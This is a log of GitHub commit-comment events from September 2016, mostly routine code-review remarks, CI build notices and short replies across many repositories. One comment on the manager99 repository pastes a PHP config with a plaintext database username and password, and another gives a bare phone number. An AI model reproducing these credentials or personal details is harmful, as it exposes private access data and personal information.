{"id":"4526072812","type":"CommitCommentEvent","actor":{"login":"OldStd"},"repo":{"name":"OldStd/OldStd.github.io"},"payload":{"comment":{"id":18924489,"position":null,"line":null,"path":null,"commit_id":"c22621054eb548e7dd6279bd5454ffad23e6187f","created_at":"2016-09-07T08:10:16Z","updated_at":"2016-09-07T08:10:16Z","body":"<!DOCTYPE html>\r\n<html>\r\n\t<head>\r\n\t\t<title>My own webpage</title>\r\n\t</head>\r\n\t<body>\r\n\r\n\t<h1>Google Maps</h1>\r\n\t\r\n\r\n\t<p>This is the first project after learning Html Basic 1</p>\r\n\t<p>I have put in a title and a heading</p>\r\n\t<p>I have also included a link to the Google Maps</p>\r\n\r\n\r\n    <a href=\"https://www.google.com.my/maps/@3.2022265,101.3409353,9z?hl=en\">Google Maps</a>\r\n<p>Here is an image of Cheng Sun Restaurant in Ijok</p>\r\n\t<p>Obtained through the Google Maps</p>\r\n\t<img src=\"https://lh3.googleusercontent.com/-r2myE-I5DN0/Vkh8DJuOaOI/AAAAAAAAS7o/w-AV343xoF0ZA3KJV7tyR24evR66kHMWA/s408-k-no/\"></img>\r\n\r\n\r\n\t</body>\r\n</html>"}},"created_at":"2016-09-07T08:10:16Z"}
{"id":"4526075250","type":"CommitCommentEvent","actor":{"login":"jairovengoechea"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18924490,"position":83,"line":72,"path":"instaparent/inc/MarketAreasTable.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-07T08:10:48Z","updated_at":"2016-09-07T08:10:48Z","body":"Will do"}},"created_at":"2016-09-07T08:10:48Z"}
{"id":"4526075265","type":"CommitCommentEvent","actor":{"login":"ampli"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18924491,"position":null,"line":null,"path":null,"commit_id":"74f421656e6b285a4410f6e6f0b0fabbae11bf5e","created_at":"2016-09-07T08:10:49Z","updated_at":"2016-09-07T08:10:49Z","body":"> typedef int locale_t;\r\n\r\nNote that it is defined here only if  `HAVE_LOCALE_T` is not defined.\r\n\r\n> /usr/include/xlocale.h:34:28: note: previous definition is here\r\n> typedef struct _xlocale * locale_t;\r\n\r\nBut your system has `locale_t`...\r\n\r\nSo the question is why `HAVE_LOCALE_T` is not defined.\r\nHave you run `configure`?\r\n\r\n(If you ran it, please check in config.log for the locale_t test.) \r\n"}},"created_at":"2016-09-07T08:10:49Z"}
{"id":"4526076121","type":"CommitCommentEvent","actor":{"login":"neviko"},"repo":{"name":"neviko/C-projects"},"payload":{"comment":{"id":18924494,"position":null,"line":null,"path":null,"commit_id":"05edcc16fab9046767bbfe662a68defd6cb55b27","created_at":"2016-09-07T08:11:01Z","updated_at":"2016-09-07T08:11:01Z","body":"delete"}},"created_at":"2016-09-07T08:11:01Z"}
{"id":"4526076580","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18924496,"position":null,"line":null,"path":null,"commit_id":"f265fb1a67ef00bf18983c7d7b7636ece70613ef","created_at":"2016-09-07T08:11:09Z","updated_at":"2016-09-07T08:11:09Z","body":"Np"}},"created_at":"2016-09-07T08:11:09Z"}
{"id":"4526077648","type":"CommitCommentEvent","actor":{"login":"YegorF2010"},"repo":{"name":"YegorF2010/site"},"payload":{"comment":{"id":18924497,"position":4,"line":9,"path":"index.html","commit_id":"2f495d0f95f2e32f8b0d90c5318728a0c864cec9","created_at":"2016-09-07T08:11:23Z","updated_at":"2016-09-07T08:11:23Z","body":"what a fuck"}},"created_at":"2016-09-07T08:11:23Z"}
{"id":"4526079292","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"Gene42/phenotips-niaid"},"payload":{"comment":{"id":18924499,"position":27,"line":107,"path":"genetic-evaluation/api/src/main/java/org/phenotips/data/genetics/internal/VariantListController.java","commit_id":"812f65517a72e4ef605362de08185c1725a8874c","created_at":"2016-09-07T08:11:46Z","updated_at":"2016-09-07T08:11:46Z","body":"Is this expected?"}},"created_at":"2016-09-07T08:11:46Z"}
{"id":"4526080140","type":"CommitCommentEvent","actor":{"login":"luccioman"},"repo":{"name":"yacy/yacy_webclient_bootstrap"},"payload":{"comment":{"id":18924502,"position":null,"line":null,"path":null,"commit_id":"37bd722c9414e2d06500d36c9e8072e10cd56df5","created_at":"2016-09-07T08:11:57Z","updated_at":"2016-09-07T08:11:57Z","body":"@Orbiter , very clever idea to host this on GitHub using the gh-pages branch!"}},"created_at":"2016-09-07T08:11:57Z"}
{"id":"4526085195","type":"CommitCommentEvent","actor":{"login":"vjay971"},"repo":{"name":"vjay971/jay"},"payload":{"comment":{"id":18924518,"position":3,"line":3,"path":"init","commit_id":"00f696b15e472b66073bd749666663a306637530","created_at":"2016-09-07T08:13:07Z","updated_at":"2016-09-07T08:13:07Z","body":"false"}},"created_at":"2016-09-07T08:13:07Z"}
{"id":"4526089909","type":"CommitCommentEvent","actor":{"login":"nortonharris"},"repo":{"name":"danielchim/codename-kali-"},"payload":{"comment":{"id":18924528,"position":null,"line":null,"path":null,"commit_id":"37de8668f74e65f9c441dc0ea1c1fe9eb9992b44","created_at":"2016-09-07T08:14:10Z","updated_at":"2016-09-07T08:14:10Z","body":"This vision has passed"}},"created_at":"2016-09-07T08:14:10Z"}
{"id":"4526092154","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18924532,"position":null,"line":null,"path":null,"commit_id":"03a08911b0cc23e9a0c1c0fa448d537016f277c1","created_at":"2016-09-07T08:14:40Z","updated_at":"2016-09-07T08:14:40Z","body":"Removed unnecessary cast during addition.\r\n\r\nSeems like left side is precise as well. Problem seems to happen only when adding (or comparing). Seems like internal representation is approximate.\r\n\r\nBut if internal is approximate. How does the comparison go? Seems like it compares representation. Occasionally adding brings in a *1* at the end. Still confused if accurate."}},"created_at":"2016-09-07T08:14:40Z"}
{"id":"4526094377","type":"CommitCommentEvent","actor":{"login":"idealsea"},"repo":{"name":"idealsea/haitao.github.io"},"payload":{"comment":{"id":18924536,"position":null,"line":null,"path":null,"commit_id":"dac9c09bdfe7c895a5f93aed696851eab9a8b69b","created_at":"2016-09-07T08:15:13Z","updated_at":"2016-09-07T08:15:13Z","body":"tks"}},"created_at":"2016-09-07T08:15:13Z"}
{"id":"4526096598","type":"CommitCommentEvent","actor":{"login":"nani2617"},"repo":{"name":"nirkaufman/lazyLoadingDemo"},"payload":{"comment":{"id":18924540,"position":26,"line":26,"path":"app/app.js","commit_id":"0566e18676ce432f2660cd9a9a7a3d09da43ebc8","created_at":"2016-09-07T08:15:39Z","updated_at":"2016-09-07T08:15:39Z","body":"where config"}},"created_at":"2016-09-07T08:15:39Z"}
{"id":"4526097849","type":"CommitCommentEvent","actor":{"login":"arax"},"repo":{"name":"Mamut3D/guocci"},"payload":{"comment":{"id":18924545,"position":3,"line":1,"path":"tmp/pids/server.pid","commit_id":"e50c439c06068015763c6d2fce38a441c5cfbf05","created_at":"2016-09-07T08:15:57Z","updated_at":"2016-09-07T08:15:57Z","body":"!fix Omit from commit :-)"}},"created_at":"2016-09-07T08:15:57Z"}
{"id":"4526097961","type":"CommitCommentEvent","actor":{"login":"jmaher"},"repo":{"name":"mozilla/ouija"},"payload":{"comment":{"id":18924546,"position":null,"line":null,"path":null,"commit_id":"10eb405dd2efb69ab63cc8df8ad1400d74777d8c","created_at":"2016-09-07T08:15:58Z","updated_at":"2016-09-07T08:15:58Z","body":"I accidentally pushed my PR to mozilla, not jmaher, so that is where\nmigration came from, I will delete it shortly!\n\nI do believe we should take these changes to master and heroku, let me know\nif you have any concerns with specific lines going there- I will review it\nprior to migrating as well.\n\nOn Tue, Sep 6, 2016 at 9:15 PM, Tiramisu 1993 <notifications@github.com>\nwrote:\n\n> r+!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mozilla/ouija/commit/10eb405dd2efb69ab63cc8df8ad1400d74777d8c#commitcomment-18921666>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAD0fOuoopeMskH345PF28MLZppFWqS1ks5qnhAYgaJpZM4J15yS>\n> .\n>\n"}},"created_at":"2016-09-07T08:15:58Z"}
{"id":"4526098916","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924548,"position":null,"line":null,"path":null,"commit_id":"c4546b528e1d5ec65e473a71db44a4fb99b4c2b3","created_at":"2016-09-07T08:16:12Z","updated_at":"2016-09-07T08:16:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 938](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12789&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T08:16:12Z"}
{"id":"4526099826","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924551,"position":null,"line":null,"path":null,"commit_id":"c4546b528e1d5ec65e473a71db44a4fb99b4c2b3","created_at":"2016-09-07T08:16:23Z","updated_at":"2016-09-07T08:16:23Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 939](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12791&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T08:16:23Z"}
{"id":"4526100510","type":"CommitCommentEvent","actor":{"login":"kakeyang"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924552,"position":56,"line":61,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:16:33Z","updated_at":"2016-09-07T08:16:33Z","body":"I want you to unify the position of `{`."}},"created_at":"2016-09-07T08:16:33Z"}
{"id":"4526100839","type":"CommitCommentEvent","actor":{"login":"elninograff"},"repo":{"name":"elninograff/Brassart"},"payload":{"comment":{"id":18924553,"position":null,"line":null,"path":null,"commit_id":"a966d5bf1827947b380c0d09805c19426c923af3","created_at":"2016-09-07T08:16:38Z","updated_at":"2016-09-07T08:16:38Z","body":"projet Brassart 01"}},"created_at":"2016-09-07T08:16:38Z"}
{"id":"4526103767","type":"CommitCommentEvent","actor":{"login":"kakeyang"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924560,"position":73,"line":76,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:17:17Z","updated_at":"2016-09-07T08:17:17Z","body":"In PHP, please use `!==` or `===`.\r\n"}},"created_at":"2016-09-07T08:17:17Z"}
{"id":"4526105497","type":"CommitCommentEvent","actor":{"login":"tuananhpham94"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924564,"position":66,"line":71,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:17:40Z","updated_at":"2016-09-07T08:17:40Z","body":"this is get method ? it should be post method"}},"created_at":"2016-09-07T08:17:40Z"}
{"id":"4526109505","type":"CommitCommentEvent","actor":{"login":"dawkum"},"repo":{"name":"gohed/ProgrammingAssignment2"},"payload":{"comment":{"id":18924576,"position":null,"line":null,"path":null,"commit_id":"08c761166f51cca344097daca3e6224c9282fef0","created_at":"2016-09-07T08:18:33Z","updated_at":"2016-09-07T08:18:33Z","body":"good."}},"created_at":"2016-09-07T08:18:33Z"}
{"id":"4526111196","type":"CommitCommentEvent","actor":{"login":"aichholzer"},"repo":{"name":"aichholzer/boxen-cli"},"payload":{"comment":{"id":18924578,"position":23,"line":60,"path":"test.js","commit_id":"9fd9d06082436919b8e8e07d2cd51043c8305577","created_at":"2016-09-07T08:18:56Z","updated_at":"2016-09-07T08:18:56Z","body":"https://github.com/sindresorhus/boxen/pull/14\r\nThe above pull request refers to this."}},"created_at":"2016-09-07T08:18:56Z"}
{"id":"4526115120","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":18924584,"position":null,"line":null,"path":null,"commit_id":"71aab9098eeb85767bf76a6294c9b3780bdb73ea","created_at":"2016-09-07T08:19:45Z","updated_at":"2016-09-07T08:19:45Z","body":"Ooohhh... Thanks :)"}},"created_at":"2016-09-07T08:19:45Z"}
{"id":"4526115159","type":"CommitCommentEvent","actor":{"login":"honoreds"},"repo":{"name":"honoreds/ipci_honoreds"},"payload":{"comment":{"id":18924585,"position":1,"line":1,"path":"Eclesiaste 4","commit_id":"b36ea0854aa11e7eadd885fa6d509a70731fa4d5","created_at":"2016-09-07T08:19:46Z","updated_at":"2016-09-07T08:19:46Z","body":"chapitre 2\r\n"}},"created_at":"2016-09-07T08:19:46Z"}
{"id":"4526115612","type":"CommitCommentEvent","actor":{"login":"kakeyang"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924586,"position":79,"line":82,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:19:53Z","updated_at":"2016-09-07T08:19:53Z","body":"For test app, this code may be acceptable but the app of production can't be acceptable because it doesn't assume error case. This logic has the precondition that delete() always can complete successfully. But we should assume the case of invalid case for example DB is dead."}},"created_at":"2016-09-07T08:19:53Z"}
{"id":"4526115972","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18924588,"position":104,"line":174,"path":"main/gradebook/lib/be/studentpublicationlink.class.php","commit_id":"1fc7546107e4d1dd9a8e38644678484bd74aedbe","created_at":"2016-09-07T08:19:57Z","updated_at":"2016-09-07T08:19:57Z","body":"Este query no funciona para nada."}},"created_at":"2016-09-07T08:19:57Z"}
{"id":"4526116095","type":"CommitCommentEvent","actor":{"login":"honoreds"},"repo":{"name":"honoreds/ipci_honoreds"},"payload":{"comment":{"id":18924589,"position":null,"line":null,"path":null,"commit_id":"b36ea0854aa11e7eadd885fa6d509a70731fa4d5","created_at":"2016-09-07T08:19:59Z","updated_at":"2016-09-07T08:19:59Z","body":"ok"}},"created_at":"2016-09-07T08:19:59Z"}
{"id":"4526116555","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18924593,"position":null,"line":null,"path":null,"commit_id":"d9c76736cc6e3b8e9a7dc06bf824d06a22a6a699","created_at":"2016-09-07T08:20:05Z","updated_at":"2016-09-07T08:20:05Z","body":"Why not just set `platforms` like all other packages do? You can override meta anyway later on."}},"created_at":"2016-09-07T08:20:05Z"}
{"id":"4526117565","type":"CommitCommentEvent","actor":{"login":"honoreds"},"repo":{"name":"honoreds/ipci_honoreds"},"payload":{"comment":{"id":18924596,"position":null,"line":null,"path":null,"commit_id":"b36ea0854aa11e7eadd885fa6d509a70731fa4d5","created_at":"2016-09-07T08:20:19Z","updated_at":"2016-09-07T08:20:19Z","body":"c'est bon"}},"created_at":"2016-09-07T08:20:19Z"}
{"id":"4526118620","type":"CommitCommentEvent","actor":{"login":"jairovengoechea"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18924598,"position":87,"line":76,"path":"instaparent/inc/MarketAreasTable.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-07T08:20:31Z","updated_at":"2016-09-07T08:20:31Z","body":"This is converting the array of objects into a multidimensional array:\r\nHere are a couple of references:\r\nhttps://richjenks.com/converting-objects-arrays/\r\nhttps://coderwall.com/p/k-bwtq/the-fastest-way-to-convert-array-to-object-multidimensional"}},"created_at":"2016-09-07T08:20:31Z"}
{"id":"4526121071","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18924604,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T08:21:03Z","updated_at":"2016-09-07T08:21:03Z","body":"To add to my concerns, the `Jar` page in the DSL reference doesn't show any examples, unlike several of the other reference pages, such as [`Test`](https://docs.gradle.org/3.0/dsl/org.gradle.api.tasks.testing.Test.html)."}},"created_at":"2016-09-07T08:21:03Z"}
{"id":"4526123190","type":"CommitCommentEvent","actor":{"login":"KevinCMake"},"repo":{"name":"leadingtw273/Light-Cube-Project"},"payload":{"comment":{"id":18924612,"position":9,"line":5,"path":"README","commit_id":"c53aee39a9f98795fcbdbb97efef4f8e0d291c5a","created_at":"2016-09-07T08:21:31Z","updated_at":"2016-09-07T08:21:31Z","body":"陳亦凱"}},"created_at":"2016-09-07T08:21:31Z"}
{"id":"4526124446","type":"CommitCommentEvent","actor":{"login":"KevinCMake"},"repo":{"name":"leadingtw273/Light-Cube-Project"},"payload":{"comment":{"id":18924614,"position":10,"line":6,"path":"README","commit_id":"c53aee39a9f98795fcbdbb97efef4f8e0d291c5a","created_at":"2016-09-07T08:21:48Z","updated_at":"2016-09-07T08:21:48Z","body":"0983875609"}},"created_at":"2016-09-07T08:21:48Z"}
{"id":"4526125463","type":"CommitCommentEvent","actor":{"login":"shypike"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18924615,"position":null,"line":null,"path":null,"commit_id":"1157e498f01a787dff01e9ab3fb5610d60b60611","created_at":"2016-09-07T08:22:02Z","updated_at":"2016-09-07T08:22:02Z","body":"@thezoggy NNTP is not supported by \"requests\".\r\n@sanderjo The protocol is called NNTP, not NTTP.\r\n"}},"created_at":"2016-09-07T08:22:02Z"}
{"id":"4526126361","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18924618,"position":104,"line":174,"path":"main/gradebook/lib/be/studentpublicationlink.class.php","commit_id":"1fc7546107e4d1dd9a8e38644678484bd74aedbe","created_at":"2016-09-07T08:22:15Z","updated_at":"2016-09-07T08:22:15Z","body":"Y es mejor de usar repositorios y no queries de esa manera.\r\nVer: \r\nsrc/Chamilo/CourseBundle/Entity/Repository/CStudentPublicationRepository.php\r\n"}},"created_at":"2016-09-07T08:22:15Z"}
{"id":"4526127201","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18924621,"position":5,"line":7,"path":"nixos/modules/virtualisation/lxc-container.nix","commit_id":"1cb5583c0599c7a164019badc8f093acd7e4488b","created_at":"2016-09-07T08:22:25Z","updated_at":"2016-09-07T08:22:25Z","body":"@edolstra Why should things from profiles/ not be included here? And, more generally, what should be placed in profiles/ and what should be placed in virtualisation/? In profiles/ we have for example `qemu-guest.nix` and `docker-container.nix`, and here we have `container-config.nix` etc."}},"created_at":"2016-09-07T08:22:25Z"}
{"id":"4526128513","type":"CommitCommentEvent","actor":{"login":"sushmachowdary"},"repo":{"name":"sushmachowdary/master"},"payload":{"comment":{"id":18924623,"position":null,"line":null,"path":null,"commit_id":"675261e86fb4a2e270b3e0e73bef625909fe3d12","created_at":"2016-09-07T08:22:42Z","updated_at":"2016-09-07T08:22:42Z","body":"sample test\r\n"}},"created_at":"2016-09-07T08:22:42Z"}
{"id":"4526137758","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924637,"position":null,"line":null,"path":null,"commit_id":"c4546b528e1d5ec65e473a71db44a4fb99b4c2b3","created_at":"2016-09-07T08:24:44Z","updated_at":"2016-09-07T08:24:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 939](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12791&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:21"}},"created_at":"2016-09-07T08:24:44Z"}
{"id":"4526137831","type":"CommitCommentEvent","actor":{"login":"mrquincle"},"repo":{"name":"crownstone/bluenet"},"payload":{"comment":{"id":18924638,"position":null,"line":null,"path":null,"commit_id":"66e0a6e4bb7a656679b0ae9e20df61c6ddf3a7e3","created_at":"2016-09-07T08:24:44Z","updated_at":"2016-09-07T08:24:44Z","body":"I created a `BLUENET_BUILD_DIR` so people can decide themselves where it will be built."}},"created_at":"2016-09-07T08:24:44Z"}
{"id":"4526138358","type":"CommitCommentEvent","actor":{"login":"dawkum"},"repo":{"name":"Ujwala89/ProgrammingAssignment2"},"payload":{"comment":{"id":18924640,"position":null,"line":null,"path":null,"commit_id":"281cb8caf260ac467cf0776097d88ad69b12ee9c","created_at":"2016-09-07T08:24:52Z","updated_at":"2016-09-07T08:24:52Z","body":"guru!"}},"created_at":"2016-09-07T08:24:52Z"}
{"id":"4526139511","type":"CommitCommentEvent","actor":{"login":"TheDeibo"},"repo":{"name":"LostTeam/LostBot"},"payload":{"comment":{"id":18924642,"position":null,"line":null,"path":null,"commit_id":"c9ed053b51c2af2da8b7cbabc2474a62f5673b8b","created_at":"2016-09-07T08:25:05Z","updated_at":"2016-09-07T08:25:05Z","body":"I've just noticed two diferent ways of coding xD\r\n\r\nYou code like this \r\n`TF::BLUE.TF::BOLD.\"Jarvis\".TF::RESET.TF::GREY.\" > Welcome \" . $name . \"!\");`\r\n\r\nand I code like this\r\n`$player->sendMessage(TF::RED . \"LostBot\" . TF::WHITE . \" > Hello to you too, \" . $name . \"!\");`\r\n\r\nappart from the function of the plugin, hey are still diferent in coding style."}},"created_at":"2016-09-07T08:25:05Z"}
{"id":"4526142133","type":"CommitCommentEvent","actor":{"login":"zander"},"repo":{"name":"bitcoinclassic/bitcoinclassic"},"payload":{"comment":{"id":18924645,"position":null,"line":null,"path":null,"commit_id":"e79a8dfeef145343741725ccbafff513beb4b99c","created_at":"2016-09-07T08:25:36Z","updated_at":"2016-09-07T08:25:36Z","body":"Like NiKiZe said, your question is not relevant to this commit.\r\n\r\nThe only 'gotcha' in this commit is that the unit tests stop including a lib, and thus functionality, and the question may be how they still link.\r\nThe answer to that is that after this change there now is some dead code. Code no longer compiled (due to ifdefs) and no longer tested. Its just a formal change as the code was never part of any executable and practically speaking unused code, which is another form of dead code."}},"created_at":"2016-09-07T08:25:36Z"}
{"id":"4526142719","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924649,"position":null,"line":null,"path":null,"commit_id":"c4546b528e1d5ec65e473a71db44a4fb99b4c2b3","created_at":"2016-09-07T08:25:44Z","updated_at":"2016-09-07T08:25:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 938](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12789&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:31"}},"created_at":"2016-09-07T08:25:44Z"}
{"id":"4526146378","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18924664,"position":null,"line":null,"path":null,"commit_id":"d9c76736cc6e3b8e9a7dc06bf824d06a22a6a699","created_at":"2016-09-07T08:26:30Z","updated_at":"2016-09-07T08:26:30Z","body":">Why not just set `platforms` like all other packages do?\n\nBecause that's what was happening initially — but RAM requirements \ndepend on how many dependencies were replaced with null. There are\nnow multiple octave packages in Nixpkgs with the same expression.\n\n>You can override meta anyway later on.\n\nWell, the choice is to put a small piece of annoying code into the \npackage or into all-packages.nix.\n\n\n\n"}},"created_at":"2016-09-07T08:26:30Z"}
{"id":"4526146440","type":"CommitCommentEvent","actor":{"login":"bekeen99"},"repo":{"name":"hieuthuy/manager99"},"payload":{"comment":{"id":18924666,"position":null,"line":null,"path":null,"commit_id":"fd317524e8eb2f97dc324110b2a307db298250ff","created_at":"2016-09-07T08:26:31Z","updated_at":"2016-09-07T08:26:31Z","body":"<?php if (!defined('ACCESS')) die('Not access'); else $databases = array('db_host' => 'localhost', 'db_username' => 'adminbCkWYnb', 'db_password' => 'EilWqIjpa1Nf', 'db_name' => 'itgroup', 'is_auto' => true); ?>\r\n  \r\n            \r\n\r\n"}},"created_at":"2016-09-07T08:26:31Z"}
{"id":"4526150074","type":"CommitCommentEvent","actor":{"login":"oktawiraratama"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18924674,"position":null,"line":null,"path":null,"commit_id":"05e788853aca0cfa07d88c7607b8cdb44d466c71","created_at":"2016-09-07T08:27:19Z","updated_at":"2016-09-07T08:27:19Z","body":"i wanna ask, why after update my bot didn't work again ?\r\nthis is screenshoot\r\n![screenshot 15](https://cloud.githubusercontent.com/assets/7028733/18304961/8389f2f2-750f-11e6-9f30-860fe4352887.png)\r\n"}},"created_at":"2016-09-07T08:27:19Z"}
{"id":"4526156082","type":"CommitCommentEvent","actor":{"login":"zckrs"},"repo":{"name":"FountainJS/generator-fountain-gulp"},"payload":{"comment":{"id":18924685,"position":null,"line":null,"path":null,"commit_id":"4bf94eb8eda4c2c43489fdefe880b9efbaebb1fc","created_at":"2016-09-07T08:28:32Z","updated_at":"2016-09-07T08:28:32Z","body":"@BkSouX here \r\n\r\nhttps://github.com/FountainJS/generator-fountain-gulp/blob/master/generators/app/templates/gulp_tasks/partials.js#L3"}},"created_at":"2016-09-07T08:28:32Z"}
{"id":"4526157076","type":"CommitCommentEvent","actor":{"login":"evilcatkimi"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924688,"position":79,"line":82,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:28:45Z","updated_at":"2016-09-07T08:28:45Z","body":"i will think about it, thank boss."}},"created_at":"2016-09-07T08:28:45Z"}
{"id":"4526159753","type":"CommitCommentEvent","actor":{"login":"stevenliuit"},"repo":{"name":"Dearms/z2121"},"payload":{"comment":{"id":18924692,"position":null,"line":null,"path":null,"commit_id":"d350664b62a311b8611da73a5f9e43d3c6c30e0b","created_at":"2016-09-07T08:29:18Z","updated_at":"2016-09-07T08:29:18Z","body":"什么时候出cm14的rom包啊？"}},"created_at":"2016-09-07T08:29:18Z"}
{"id":"4526162491","type":"CommitCommentEvent","actor":{"login":"gotev"},"repo":{"name":"bringnow/react-native"},"payload":{"comment":{"id":18924700,"position":null,"line":null,"path":null,"commit_id":"c8092220dfe7da2c417688969e83097ecfc0e2aa","created_at":"2016-09-07T08:29:54Z","updated_at":"2016-09-07T08:29:54Z","body":"@fkoester Jesse Wilson from OkHttp said that the private `SSLSocketFactory` member should be called `delegate` for proper working with newer OkHttp versions, due to reflection that has been used internally"}},"created_at":"2016-09-07T08:29:54Z"}
{"id":"4526163591","type":"CommitCommentEvent","actor":{"login":"suny16907"},"repo":{"name":"nlp-compromise/nlp_compromise"},"payload":{"comment":{"id":18924703,"position":null,"line":null,"path":null,"commit_id":"e839a98735b685a59fcdaaf142f6f8f94e15b07c","created_at":"2016-09-07T08:30:10Z","updated_at":"2016-09-07T08:30:10Z","body":"we need something to eat"}},"created_at":"2016-09-07T08:30:10Z"}
{"id":"4526165980","type":"CommitCommentEvent","actor":{"login":"wilr"},"repo":{"name":"dnadesign/silverstripe-elemental"},"payload":{"comment":{"id":18924707,"position":67,"line":97,"path":"code/models/ElementVirtualLinked.php","commit_id":"61ccecd3bff2f9b9d8b14a6b5d7da626db9f3bf6","created_at":"2016-09-07T08:30:34Z","updated_at":"2016-09-07T08:30:34Z","body":"Not sure if this should be pushed into the main repo. Pretty sure this will fail on other installed @Leapfrognz "}},"created_at":"2016-09-07T08:30:34Z"}
{"id":"4526168141","type":"CommitCommentEvent","actor":{"login":"wilr"},"repo":{"name":"dnadesign/silverstripe-elemental"},"payload":{"comment":{"id":18924717,"position":1,"line":1,"path":"templates/elements/ElementVirtualLinked.ss","commit_id":"61ccecd3bff2f9b9d8b14a6b5d7da626db9f3bf6","created_at":"2016-09-07T08:30:59Z","updated_at":"2016-09-07T08:30:59Z","body":"Debugging?"}},"created_at":"2016-09-07T08:30:59Z"}
{"id":"4526168485","type":"CommitCommentEvent","actor":{"login":"ashdnazg"},"repo":{"name":"Spring-Chobby/Chobby"},"payload":{"comment":{"id":18924718,"position":null,"line":null,"path":null,"commit_id":"1e5b8483abac0a44b0076c6133de1e6de2bc0505","created_at":"2016-09-07T08:31:03Z","updated_at":"2016-09-07T08:31:03Z","body":"if it's not an actual modinfo entry, it may be better to put it in comments (so someone who reads it doesn't get wrong impressions)"}},"created_at":"2016-09-07T08:31:03Z"}
{"id":"4526170550","type":"CommitCommentEvent","actor":{"login":"moriony"},"repo":{"name":"moriony/silex-sentry-provider"},"payload":{"comment":{"id":18924726,"position":null,"line":null,"path":null,"commit_id":"da74b10e2dd6e5628250f08563a20b55cee04197","created_at":"2016-09-07T08:31:28Z","updated_at":"2016-09-07T08:31:28Z","body":"@tejaskotecha See [release 1.0.5](https://github.com/moriony/silex-sentry-provider/releases/tag/1.0.5). I think it will help to solve your problem"}},"created_at":"2016-09-07T08:31:28Z"}
